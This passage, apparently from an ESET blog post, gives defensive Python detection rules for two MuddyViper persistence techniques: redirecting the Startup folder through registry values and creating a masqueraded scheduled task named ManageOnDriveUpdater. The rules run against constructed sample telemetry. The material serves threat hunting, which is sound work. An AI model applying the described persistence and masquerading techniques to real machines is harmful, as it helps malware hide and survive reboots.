2\/posts\/9053\/revisions\/9816"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/9054"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=9053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=9053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=9053"}],"curies":[{"name":"wp","href":"https:\/\/
api.w.org\/{rel}","templated":true}]}}
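The Persistence and Defense Evasion rows of the ATT&CK table above describe two behaviours a defender can hunt for directly in endpoint telemetry: MuddyViper rewriting the per-user Startup folder location through the User Shell Folders / Shell Folders registry values (T1112, T1547.001), and MuddyViper registering a scheduled task named ManageOnDriveUpdater (T1053, T1036.004). The following is an added detection example written for this page; it is not ESET's code nor anything recovered from the campaign. It runs over Python dicts whose fields are modelled loosely on Sysmon Event ID 13 (registry value set) and Windows Security Event ID 4698 (scheduled task created); the field names, the loader path and every sample record are constructed for the example. It also checks the redirected-Startup value for both spellings Sysmon uses for the current-user hive (HKCU and HKU\<SID>), which the table does not spell out.

```python
"""Detections for MuddyViper Startup-folder redirection (T1112 / T1547.001)
and the ManageOnDriveUpdater scheduled task (T1053 / T1036.004).

Records are dicts loosely modelled on Sysmon Event ID 13 (registry value set)
and Security Event ID 4698 (scheduled task created). Field names and all
sample values are constructed for this example, not campaign telemetry.
"""
import re

# Canonical tail of the per-user Startup folder. 'User Shell Folders' stores
# it as %USERPROFILE%\AppData\..., 'Shell Folders' stores it expanded; both
# end with this suffix, so anything else is a redirection worth looking at.
STARTUP_SUFFIX = r"\appdata\roaming\microsoft\windows\start menu\programs\startup"

# Sysmon logs the current-user hive as HKU\<SID> rather than HKCU; accept both,
# and both the 'User Shell Folders' and 'Shell Folders' value families.
STARTUP_VALUE_RE = re.compile(
    r"^HK(?:CU|U\\S-1-5-21-[\d-]+)\\software\\microsoft\\windows\\currentversion"
    r"\\explorer\\(?:user )?shell folders\\startup$",
    re.IGNORECASE,
)

MASQUERADED_TASK = "manageondriveupdater"  # task name given in the T1053 row


def startup_redirected(record):
    """Finding if a registry write points the Startup folder away from the
    default profile location, else None. Note: legitimate folder redirection
    (roaming profiles, GPO) also changes these values, so treat a hit as a
    lead to be checked against the writing image, not as a verdict."""
    if record.get("event_id") != 13:
        return None
    if not STARTUP_VALUE_RE.match(record.get("target_object", "")):
        return None
    value = record.get("details", "").strip().strip('"').lower()
    if value.endswith(STARTUP_SUFFIX):
        return None  # still the default location
    return {
        "technique": "T1112 / T1547.001",
        "reason": "Startup shell folder redirected",
        "image": record.get("image"),
        "value": record.get("details"),
    }


def task_masquerade(record):
    """Finding if a scheduled task with MuddyViper's task name is created."""
    if record.get("event_id") != 4698:
        return None
    # TaskName is a path such as \Microsoft\Windows\...\Name; compare the leaf.
    leaf = record.get("task_name", "").rsplit("\\", 1)[-1]
    if leaf.lower() != MASQUERADED_TASK:
        return None
    return {
        "technique": "T1053 / T1036.004",
        "reason": f"scheduled task {leaf} created",
        "subject": record.get("subject_user"),
    }


def scan(records):
    """Run every rule over every record and return the findings in order."""
    findings = []
    for record in records:
        for rule in (startup_redirected, task_masquerade):
            hit = rule(record)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry: one benign Explorer write, two redirections by a
# hypothetical loader, the masqueraded task, and a benign Microsoft task.
SID = r"S-1-5-21-1111-2222-3333-1001"
SHELL_KEY = r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Explorer" % SID
LOADER = r"C:\Users\user\AppData\Local\Temp\loader.exe"  # hypothetical path
SAMPLE_EVENTS = [
    {"event_id": 13, "image": r"C:\Windows\explorer.exe",
     "target_object": SHELL_KEY + r"\User Shell Folders\Startup",
     "details": r"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"},
    {"event_id": 13, "image": LOADER,
     "target_object": SHELL_KEY + r"\User Shell Folders\Startup",
     "details": r"C:\Users\Public\Libraries\Sync"},
    {"event_id": 13, "image": LOADER,
     "target_object": SHELL_KEY + r"\Shell Folders\Startup",
     "details": r"C:\Users\Public\Libraries\Sync"},
    {"event_id": 4698, "subject_user": "user", "task_name": r"\ManageOnDriveUpdater"},
    {"event_id": 4698, "subject_user": "SYSTEM",
     "task_name": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, `scan` reports the two redirection writes by the loader and the ManageOnDriveUpdater task, and stays silent on Explorer's own write of the default path and on the Microsoft update task. Pair a redirection hit with the T1547.001 row: once the Startup value points elsewhere, the folder MuddyViper copies itself into is the one Explorer will actually launch from, so the new location is where to look for the dropped binary.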